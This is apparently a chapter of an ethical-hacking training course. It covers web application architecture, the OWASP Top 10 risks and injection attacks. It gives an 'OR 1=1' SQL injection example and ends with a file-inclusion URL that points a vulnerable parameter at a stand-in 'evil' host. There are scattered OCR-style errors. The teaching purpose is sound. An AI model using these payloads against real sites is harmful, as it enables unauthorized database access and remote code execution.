Module Objectives
The evolution of Internet and Web technologies, combined with rapidly increasing Internet connectivity, defines the new business landscape. Web applications are an integral component of online business. Everyone connected via the Internet is using an endless variety of web applications for many different purposes, including online shopping, email, chats, and social networking.
Increasingly, web applications are becoming vulnerable to more sophisticated threats and attack vectors. This module will familiarize you with various web applications, web attack vectors, and how to protect an organization's information resources from them. It describes the general web-application hacking methodology that most attackers use to exploit a target system. Ethical hackers can use this methodology to assess their organization's security against web-application attacks. Thus, this module also presents several tools that are helpful at different stages of web-application security assessment.
At the end of this module, you will be able to:
■ Describe web application concepts
■ Perform various web application attacks
■ Describe about web application hacking methodology
■ Use different web application hacking tools
■ Apply web application attack's countermeasures
■ Use different web application security testing tools
■ Perform web application penetration testing
Web App Concepts
This section describes the basic concepts associated with web applications vis-^-vis security concerns—their components, how they work, their architecture, and so on. Furthermore, it provides insight into web 2.0 applications, vulnerability stacks, and possible web attack vectors on web applications.
Introduction to Web Applications
Web applications are software programs that run on web browsers and act as the interface between users and web servers through web pages. They help the users request, submit, and retrieve data to/from a database over the Internet by interacting through a user-friendly graphical user interface (GUI). Users can input data via keyboard, mouse, or touch interface, depending on the device they are using to access the web application. Built on browser- supported programming languages such as JavaScript, HTML, and CSS, the web applications work in combination with other programming languages such as SQL to access data from databases.
Web applications have helped in making web pages dynamic, as they allow users to communicate with servers using server side scripts. They allow the user to perform specific tasks such as searching, sending emails, connecting with friends, online shopping, and tracking and tracing. All the desktop applications are available to users to allow them to have the flexibility to work with the Internet as well.
Entities develop various web applications to offer their services to users via the Internet. Whenever users need access to such services, they can request them by submitting the uniform resource identifier (URI) or uniform resource locator (URL) of the web application in a browser. The browser passes this request to the server, which stores the web application data and displays it in the browser. Some popular web servers are Microsoft IIS, Apache Software Foundation's Apache HTTP Server, AO L/Net scape's Enterprise Server, and Sun One.
The increased internet and online business usage has accelerated the development and ubiquity of web applications across the globe. A key factor in the adoption of web applications for business use is the multitude of features they offer. In addition, they are relatively easy to develop, offer better services than many computer-based software applications, easy to install and maintain, secure, and easy to update.
Advantages of web applications include:
■ Being operating-system independent makes development and troubleshooting easy as well as cost-effective.
■ They are accessible anytime, anywhere, using a computer with an Internet connection. ■ The user interface is customizable, making it easy to update.
■ Users can access them on any device having an Internet browser, including PDAs, smart phones, etc.
■ Dedicated servers, monitored and managed by experienced server administrators, store all the web application data allowing the developers to increase the workload capacity.
■ Multiple locations of servers not only helps in increasing physical security, but it also lessens the burden of monitoring thousands of desktops using the program.
■ They use flexible core technologies, such as JSP, Servlets, Active Server Pages, SQL Server, and .NET scripting languages, which are scalable and support even portable platforms.
Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Web technologies such as Web 2.0 provide more attack surface for web application exploitation. Web applications and Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and improve business efficiency
How Web Applications Work
The main function of web applications is to fetch user-requested data from a database. When a user clicks or enters a URL in a browser, the web application immediately displays the requested website content in the browser.
This mechanism involves the following step-by-step process:
■ First, the user enters the website name or URL in the browser. The user's request is send to the web server.
■ On receiving the request, the web server checks the file extension:
o If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.
o If the user requests a web page with extensions that needs to be proceed at server side such as (php, asp, cfm, etc.,), then the web application server must process the request.
■ Therefore, the web server passes the user's request to the web application server, which processes the user's request.
■ The web application server accesses the database to perform the requested task by updating or retrieving the information stored on it.
■ After processing the request, web application server sends the results to the web server, which in turn sends the results to the user's browser.
Web Application Architecture
Web applications run on web browsers and use a group of server-side scripts (ASP, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The working of the web application depends on its architecture, which includes hardware and software that performs tasks such as reading the request, searching, gathering, and displaying the required data.
The web application architecture includes different devices, web browsers, and external web services that work with different scripting languages to execute the web application. The web application architecture comprises of three layers:
1. Client or presentation layer
2. Business logic layer
3. Database Layer
The client or presentation layer includes all physical devices present on the client side, such as laptops, smart phones, and computers. These devices feature operating systems and compatible browsers, which enable users to send requests for required web applications. The user requests a website by entering a URL in the browser, and the request travels to the web server. The web server responds to the request and fetches the requested data; the application displays this response in the browser in the form of a web page.
The "business logic" layer itself is comprised of two layers: the web-server logic layer and the business logic layer. The web-server logic layer contains various components, such as a firewall, an HTTP request parser, a proxy caching server, an authentication and login handler and resource handler, and a hardware component-like server. It has a firewall that offers security to the content, an HTTP request parser to handle requests coming from clients and forward responses to them, as well as a resource handler capable of handling multiple requests simultaneously. The web-server logic layer holds all coding that reads data from the browser and returns the results (e.g., IIS Web Server, Apache Web Server).
The business logic layer includes the functional logic of the web application, which is implemented using technologies such as .NET, Java, and "middleware" technologies. It defines how the data flows, according to which the developer builds the application using programming languages. The business logic layer stores the application data and integrates legacy applications with the latest functionality of the application. The server needs a specific protocol to access user-requested data from its database; this layer also contains the software and defines the steps to search and fetch the data.
The database layer is comprised of cloud services, a B2B layer that holds all the commercial transactions, and a database server that supplies an organization's production data in structured form (e.g., MS SQL Server, MySQL server).
Web 2.0 Applications
"Web 2.0" refers to technologies that use dynamic web pages, thus superseding the Web 1.0 technology, which used static HTML web pages. Web2.0 allows users to upload or download information simultaneously from a web 2.0 website. It provides an infrastructure for more dynamic user participation, social interaction, and collaboration.
The client-side technologies used for developing a web 2.0 site include frameworks, SDKs, and markup languages—namely, jQuery, Ext JS, and Prototype JavaScript Framework; Apache Flex; HTML5; and so on. These technologies enhance the ability of web 2.0 sites, enabling the users to interact continuously, play audio and videos files, edit documents online, and so on.
Client-side technologies used for developing web 2.0 sites include languages such as PHP, Ruby, Perl, and Python, as well as Enterprise Java (J2EE) and Microsoft.NET Framework to output data dynamically using information from files and databases. The present technology allows multiple web 2.0 sites to interact and share data seamlessly.
Web 2.0 facilities
■ Interoperability
o Blogs (Wordpress) o Advanced gaming
o Dynamic as opposed to static site content o RSS-generated syndication
■ User-centered Design
o Social networking sites (Facebook, Twitter, Linkedln, etc.)
o Mash-ups (Emails, IMs, Electronic payment systems) o Wikis and other collaborative applications
o Google Base and other free Web services (Google Maps) ■ Collaboration on the Web
o Cloud computing websites like (amazon.com) o Interactive encyclopedias and dictionaries
o Online office software (Google Docs and Microsoft Silverlight) o Ease of data creation, modification, or deletion by individual users
■ Interactive Data Sharing
o New technologies like AJAX (Gmail, YouTube) o Mobile application (iPhone)
o Flash rich interface websites
o Frameworks (Yahoo! Ul Library, jQuery)
Vulnerability Stack
One maintains and accesses web applications through various levels that include custom web applications, third-party components, databases, web servers, operating systems, networks, and security. All the mechanisms or services employed at each layer help the user in one way or the other to access the web application securely. When talking about web applications, organization considers security as a critical component because web applications are major sources of attacks. The following vulnerability stack shows the layers and the corresponding element/mechanism/service employed at each layer, which make web applications vulnerable.
Attackers make use of vulnerabilities of one or more elements among the seven levels to exploit them and gain unrestricted access to an application or to the entire network.
■ Layer 7
If an attacker finds vulnerabilities in business logic (implemented using languages such as .NET and Java), he/she can exploit these vulnerabilities by performing input validation attacks such as XSS.
■ Layer 6
Third-party components are services that integrate with the website to achieve certain functionality (e.g.Amazon.com targeted by an attacker is the main website; citrix.com is a third-party website).
When customers choose a product to buy, they click on a Buy/Checkout button. This redirects them to their online banking account through a payment gateway. Third-party websites such as citrix.com offer such payment gateways. Attackers might exploit this redirection and use this as a medium/pathway to enter Amazon.com and exploit it.
■ Layer 5
Databases store sensitive user information such as user IDs, passwords, phone numbers, and other particulars. Attackers might find vulnerabilities in a target website's database. Then they exploit these vulnerabilities using tools such as sqlmap to get hold of the target's database.
■ Layer 4
Webservers are software programs that host websites. When users access a website, they send a URL request to the web server. The server parses this request and responds with a webpage, which appears in the browser. Attackers can employ footprinting on a webserver, which hosts the target website and grab banners that contain information such as the web server name and its version. Attackers can use tools such as Nmap to gather the information about web server name and its version. They might then start searching for published vulnerabilities in CVE database for that particular web server or service version number and exploit any of that they find.
■ Layer 3
Attackers scan an operating system to find open ports and vulnerabilities and develop viruses/backdoors to exploit them. They send the malware through open ports to the target machine; by running it, attackers compromise the machines and gets control over them. Later, they try to access the databases of the target website.
■ Layer 2
Routers/switches route network traffic only to specific machines. Attackers flood these switches with huge number of requests that exhaust the CAM table, leading it to behave like a hub. Then they aim the target website by sniffing data (in the network), which can include credentials or other personal information.
■ Layer 1
IDS and IPS trigger alarms if any malicious traffic enters a target machine or server. Attackers perform evasion techniques to circumvent intrusion detection systems, so that while exploiting the target, the IDS/IPS does not trigger any alarm.
Web App Threats
Attackers try various application-level attacks to compromise the security of web applications to commit fraud or steal sensitive information. This section discusses various types of threats and attacks against the vulnerabilities of web applications.
OWASP Top 10 Application Security Risks - Source: https://www.owasp.org
OWASP is an international organization that provides top 10 vulnerabilities and flaws of web applications. Following are the latest OWASP top 10 application security risks.
■ Al-Injection
Injection flaws, such as SQL, command injection, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
■ A2 - Broken Authentication
Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens or to exploit other implementation flaws to assume other users' identities (temporarily or permanently).
■ A3 - Sensitive Data Exposure
Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PH (Personal Identifiable Information). Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
■ A4 - XML External Entity (XXE)
Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, internal port scanning, remote code execution, and denial of service attacks, such as the Billion Laughs attack.
■ A5 - Broken Access Control
Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users' data, change access rights, etc.
■ A6-Security Misconfiguration
Security misconfiguration is the most common issue in the web security, which is due in part to manual or ad hoc configuration (or not configuring at all), insecure default configurations, open S3 buckets, misconfigured HTTP headers, error messages containing sensitive information, not patching or upgrading systems, frameworks, dependencies, and components in a timely fashion (or at all).
■ A7 - Cross-Site Scripting (XSS)
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or it updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
■ A8 -1nsecure Deserialization
Insecure deserialization flaws occur when an application receives hostile serialized objects. Insecure deserialization leads to remote code execution. Even if deserialization flaws do not result in remote code execution, serialized objects can be replayed, tampered, or deleted to spoof users, conduct injection attacks, and elevate privileges.
■ A9 - Using Components with Known Vulnerabilities
Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
■ A10 - Insufficient Logging & Monitoring
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
Al - Injection Flaws
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. and can be easily discovered by application vulnerability scanners and fuzzers.
Attackers inject malicious code, commands, or scripts in the input gates of flawed web applications in such a way that the applications interpret and run with the newly supplied malicious input, which in turn allows them to extract sensitive information. By exploiting injection flaws in web applications, attackers can easily read, write, delete, and update any data (i.e., relevant or irrelevant to that particular application). There are many types of injection flaws, some of which are discussed below:
■ SQL Injection: SQL injection is the most common website vulnerability on the Internet, and is used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application, for execution by a backend database. In this technique, the attacker injects malicious SQL queries into the user input form either to gain unauthorized access to a database or to retrieve information directly from the database.
■ Command Injection: Attackers identify an input validation flaw in an application and exploit the vulnerability by injecting a malicious command in the application to execute supplied arbitrary commands on the host operating system. Thus, such flaws are highly dangerous.
■ LADP Injection: LDAP injection is an attack method in which websites that construct LDAP statements from user-supplied input are exploited for launching attacks. When an application fails to sanitize the user input, then the attacker modifies the LDAP statement with the help of a local proxy. This in turn results in the execution of arbitrary commands such as granting access to unauthorized queries and altering the content inside the LDAP tree.
SQL Injection Attacks
SQL injection attacks use a series of malicious SQL queries or SQL statements to directly manipulate the database. Applications often use SQL statements to authenticate users to the application, validate roles and access levels, store, obtain information for the application and user, and link to other data sources. The reason why SQL injection attacks work is that the application does not properly validate input before passing it to a SQL statement. For example, the following SQL statement,
SELECT * FROM tablename WHERE UserID= 2302
becomes the following with a simple SQL injection attack:
SELECT * FROM tablename WHERE UserID= 2302 OR 1=1
The expression "OR 1=1" evaluates to the value "TRUE," often allowing the enumeration of all user ID values from the database. An attacker uses a vulnerable web application to bypass normal security measures and obtain direct access to the valuable data. Attackers carryout the SQL injection attacks from the web browser's address bar, form fields, queries, searches, and so on. SQL injection attacksallow attackers to:
■ Log into the application without supplying valid credentials
■ Perform queries against data in the database, often even data to which the application would not normally have access
■ Modify database contents, or drop the database altogether
■ Use the trust relationships established between the web application components to access other databases
Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 15: SQL Injection.
Command Injection Attacks
Command injection flaws allow attackers to pass malicious code to different systems via web applications. The attacks include calls to an operating system over system calls, use of external programs over shell commands, and calls to the backend databases over SQL Scripts in Perl, Python, and other languages execute and insert the poorly designed web applications. If a web application uses any type of interpreter, attackers insert malicious code to inflict damage.
To perform functions, web applications must use operating system features and external programs. Although many programs invoke externally, a program frequently used is Send mail. Carefully scrub an application before passing piece of information through an HTTP external request. Otherwise, attackers can insert special characters, malicious commands, and command modifiers into information. The web application then blindly passes these characters to the external system for execution. Inserting SQL is a dangerous practice and rather widespread, as it is a command injection. Command injection attacks are easy to carry out and discover, but they are difficult to understand.
Following are some types of command injection attacks.
■ Shell Injection
o An attacker tries to craft an input string to gain shell access to a web server
■ HTML Embedding
o This type of attack is used to deface websites virtually. Using this attack, an attacker adds an extra HTML-based content to the vulnerable web application
o In HTML embedding attacks, user input to a web script is placed into the output HTML, without being checked for HTML code or scripting
■ File Injection
o The attacker exploits this vulnerability and injects malicious code into system files
http://www.certifiedhacker.com/vulnerable.php?COLOR=http://evi
1/exploit?
